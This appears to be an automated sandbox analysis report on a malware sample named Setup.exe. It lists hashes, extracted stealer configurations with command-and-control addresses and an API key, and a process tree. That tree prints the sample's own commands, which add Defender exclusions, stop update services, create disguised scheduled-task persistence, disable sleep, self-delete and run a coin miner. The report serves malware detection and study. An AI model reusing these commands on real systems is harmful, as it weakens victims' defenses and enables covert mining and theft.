Analysis
-
max time kernel
91s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
04-04-2023 15:30
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20230220-en
General
-
Target
Setup.exe
-
Size
11.0MB
-
MD5
c0c44044d48102ffe57e0adc86b68a7e
-
SHA1
8d423d0ba235843be9671f08bfc6df032607f6c4
-
SHA256
7532b02e6159a99599dafed8f44f51f9a4e4a10ce4784311ffdd682053e29c12
-
SHA512
977a342eb1b5bc8a6d6f65e54bdf42f666cccc3467d04374e7493202c6160cb82df815c68642c0166ae82b69aac46cb94d75efa1e337e9ada727584c3ae9837e
-
SSDEEP
196608:4+hMmu0Vro/dFqg4cF3VjgY7lEGpDltGgC891SWAo0Gm:41m3OMEljl7lPftGgPuDrt
Malware Config
Extracted
vidar
3.3
49bd1304650cc9c7f3f131428d9e16c2
https://steamcommunity.com/profiles/76561199492257783
https://t.me/justsometg
-
profile_id_v2
49bd1304650cc9c7f3f131428d9e16c2
-
user_agent
Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9
Extracted
laplas
http://45.159.189.105
-
api_key
6a2714906f1325d666e4cf9f6269c2352ccfb7e7f1a23c114287dc69ddf27cb0
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4416 created 2408 4416 23740942652137347770.exe 38 PID 4416 created 2408 4416 23740942652137347770.exe 38 PID 4416 created 2408 4416 23740942652137347770.exe 38 PID 4416 created 2408 4416 23740942652137347770.exe 38 PID 4416 created 2408 4416 23740942652137347770.exe 38 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Setup.exe -
XMRig Miner payload 4 IoCs
resource yara_rule behavioral2/memory/1684-482-0x00007FF7750D0000-0x00007FF775AB5000-memory.dmp xmrig behavioral2/memory/1144-486-0x00007FF7BC090000-0x00007FF7BC87F000-memory.dmp xmrig behavioral2/memory/1144-488-0x00007FF7BC090000-0x00007FF7BC87F000-memory.dmp xmrig behavioral2/memory/1144-490-0x00007FF7BC090000-0x00007FF7BC87F000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 23740942652137347770.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Setup.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation 06328958474430990439.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation 06328958474430990439.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation svcservice.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation Setup.exe -
Executes dropped EXE 6 IoCs
pid Process 2692 48977722128863891795.exe 4500 06328958474430990439.exe 4416 23740942652137347770.exe 3404 06328958474430990439.exe 1684 updater.exe 1784 svcservice.exe -
Loads dropped DLL 2 IoCs
pid Process 1028 Setup.exe 1028 Setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 06328958474430990439.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4104 Setup.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4104 set thread context of 1028 4104 Setup.exe 92 PID 4500 set thread context of 3404 4500 06328958474430990439.exe 106 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 23740942652137347770.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5060 sc.exe 4760 sc.exe 4768 sc.exe 2236 sc.exe 2624 sc.exe 760 sc.exe 4544 sc.exe 3960 sc.exe 1564 sc.exe 3884 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4612 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4104 Setup.exe 4104 Setup.exe 3764 powershell.exe 3764 powershell.exe 1028 Setup.exe 1028 Setup.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4832 powershell.exe 4832 powershell.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe 4500 06328958474430990439.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3764 powershell.exe Token: SeDebugPrivilege 4104 Setup.exe Token: SeDebugPrivilege 4500 06328958474430990439.exe Token: SeDebugPrivilege 4832 powershell.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeShutdownPrivilege 4616 powercfg.exe Token: SeCreatePagefilePrivilege 4616 powercfg.exe Token: SeShutdownPrivilege 780 powercfg.exe Token: SeCreatePagefilePrivilege 780 powercfg.exe Token: SeShutdownPrivilege 1620 powercfg.exe Token: SeCreatePagefilePrivilege 1620 powercfg.exe Token: SeShutdownPrivilege 2304 powercfg.exe Token: SeCreatePagefilePrivilege 2304 powercfg.exe Token: SeIncreaseQuotaPrivilege 3216 powershell.exe Token: SeSecurityPrivilege 3216 powershell.exe Token: SeTakeOwnershipPrivilege 3216 powershell.exe Token: SeLoadDriverPrivilege 3216 powershell.exe Token: SeSystemProfilePrivilege 3216 powershell.exe Token: SeSystemtimePrivilege 3216 powershell.exe Token: SeProfSingleProcessPrivilege 3216 powershell.exe Token: SeIncBasePriorityPrivilege 3216 powershell.exe Token: SeCreatePagefilePrivilege 3216 powershell.exe Token: SeBackupPrivilege 3216 powershell.exe Token: SeRestorePrivilege 3216 powershell.exe Token: SeShutdownPrivilege 3216 powershell.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeSystemEnvironmentPrivilege 3216 powershell.exe Token: SeRemoteShutdownPrivilege 3216 powershell.exe Token: SeUndockPrivilege 3216 powershell.exe Token: SeManageVolumePrivilege 3216 powershell.exe Token: 33 3216 powershell.exe Token: 34 3216 powershell.exe Token: 35 3216 powershell.exe Token: 36 3216 powershell.exe Token: SeIncreaseQuotaPrivilege 3216 powershell.exe Token: SeSecurityPrivilege 3216 powershell.exe Token: SeTakeOwnershipPrivilege 3216 powershell.exe Token: SeLoadDriverPrivilege 3216 powershell.exe Token: SeSystemProfilePrivilege 3216 powershell.exe Token: SeSystemtimePrivilege 3216 powershell.exe Token: SeProfSingleProcessPrivilege 3216 powershell.exe Token: SeIncBasePriorityPrivilege 3216 powershell.exe Token: SeCreatePagefilePrivilege 3216 powershell.exe Token: SeBackupPrivilege 3216 powershell.exe Token: SeRestorePrivilege 3216 powershell.exe Token: SeShutdownPrivilege 3216 powershell.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeSystemEnvironmentPrivilege 3216 powershell.exe Token: SeRemoteShutdownPrivilege 3216 powershell.exe Token: SeUndockPrivilege 3216 powershell.exe Token: SeManageVolumePrivilege 3216 powershell.exe Token: 33 3216 powershell.exe Token: 34 3216 powershell.exe Token: 35 3216 powershell.exe Token: 36 3216 powershell.exe Token: SeIncreaseQuotaPrivilege 3216 powershell.exe Token: SeSecurityPrivilege 3216 powershell.exe Token: SeTakeOwnershipPrivilege 3216 powershell.exe Token: SeLoadDriverPrivilege 3216 powershell.exe Token: SeSystemProfilePrivilege 3216 powershell.exe Token: SeSystemtimePrivilege 3216 powershell.exe Token: SeProfSingleProcessPrivilege 3216 powershell.exe Token: SeIncBasePriorityPrivilege 3216 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4104 wrote to memory of 3764 4104 Setup.exe 87 PID 4104 wrote to memory of 3764 4104 Setup.exe 87 PID 4104 wrote to memory of 3764 4104 Setup.exe 87 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 4104 wrote to memory of 1028 4104 Setup.exe 92 PID 1028 wrote to memory of 2692 1028 Setup.exe 94 PID 1028 wrote to memory of 2692 1028 Setup.exe 94 PID 2692 wrote to memory of 4124 2692 48977722128863891795.exe 97 PID 2692 wrote to memory of 4124 2692 48977722128863891795.exe 97 PID 4124 wrote to memory of 5108 4124 cmd.exe 98 PID 4124 wrote to memory of 5108 4124 cmd.exe 98 PID 1028 wrote to memory of 4500 1028 Setup.exe 99 PID 1028 wrote to memory of 4500 1028 Setup.exe 99 PID 1028 wrote to memory of 4500 1028 Setup.exe 99 PID 4500 wrote to memory of 4832 4500 06328958474430990439.exe 100 PID 4500 wrote to memory of 4832 4500 06328958474430990439.exe 100 PID 4500 wrote to memory of 4832 4500 06328958474430990439.exe 100 PID 1028 wrote to memory of 4416 1028 Setup.exe 102 PID 1028 wrote to memory of 4416 1028 Setup.exe 102 PID 1028 wrote to memory of 2036 1028 Setup.exe 103 PID 1028 wrote to memory of 2036 1028 Setup.exe 103 PID 1028 wrote to memory of 2036 1028 Setup.exe 103 PID 2036 wrote to memory of 4612 2036 cmd.exe 105 PID 2036 wrote to memory of 4612 2036 cmd.exe 105 PID 2036 wrote to memory of 4612 2036 cmd.exe 105 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4500 wrote to memory of 3404 4500 06328958474430990439.exe 106 PID 4380 wrote to memory of 760 4380 cmd.exe 112 PID 4380 wrote to memory of 760 4380 cmd.exe 112 PID 4380 wrote to memory of 5060 4380 cmd.exe 113 PID 4380 wrote to memory of 5060 4380 cmd.exe 113 PID 4380 wrote to memory of 4544 4380 cmd.exe 114 PID 4380 wrote to memory of 4544 4380 cmd.exe 114 PID 4380 wrote to memory of 4760 4380 cmd.exe 115 PID 4380 wrote to memory of 4760 4380 cmd.exe 115 PID 4380 wrote to memory of 3960 4380 cmd.exe 116 PID 4380 wrote to memory of 3960 4380 cmd.exe 116 PID 2944 wrote to memory of 4616 2944 cmd.exe 121 PID 2944 wrote to memory of 4616 2944 cmd.exe 121 PID 2944 wrote to memory of 780 2944 cmd.exe 122 PID 2944 wrote to memory of 780 2944 cmd.exe 122 PID 2944 wrote to memory of 1620 2944 cmd.exe 123 PID 2944 wrote to memory of 1620 2944 cmd.exe 123 PID 2944 wrote to memory of 2304 2944 cmd.exe 124 PID 2944 wrote to memory of 2304 2944 cmd.exe 124 PID 3404 wrote to memory of 1784 3404 06328958474430990439.exe 109 PID 3404 wrote to memory of 1784 3404 06328958474430990439.exe 109 PID 3404 wrote to memory of 1784 3404 06328958474430990439.exe 109 PID 1784 wrote to memory of 4360 1784 svcservice.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2408
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exeC:\Users\Admin\AppData\Local\Temp\Setup.exe3⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\ProgramData\48977722128863891795.exe"C:\ProgramData\48977722128863891795.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\48977722128863891795.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵PID:5108
-
-
-
-
C:\ProgramData\06328958474430990439.exe"C:\ProgramData\06328958474430990439.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\ProgramData\06328958474430990439.exeC:\ProgramData\06328958474430990439.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==7⤵PID:4360
-
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵PID:1276
-
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵PID:1196
-
-
-
-
-
C:\ProgramData\23740942652137347770.exe"C:\ProgramData\23740942652137347770.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:4416
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Setup.exe" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:4612
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:760
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5060
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4544
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4760
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3960
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:780
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4748
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1484
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1564
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3884
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2236
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2624
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4768
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:1476
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4236
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4572
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2420
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5028
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4144
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:396
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1144
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Executes dropped EXE
PID:1684
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
Filesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
Filesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
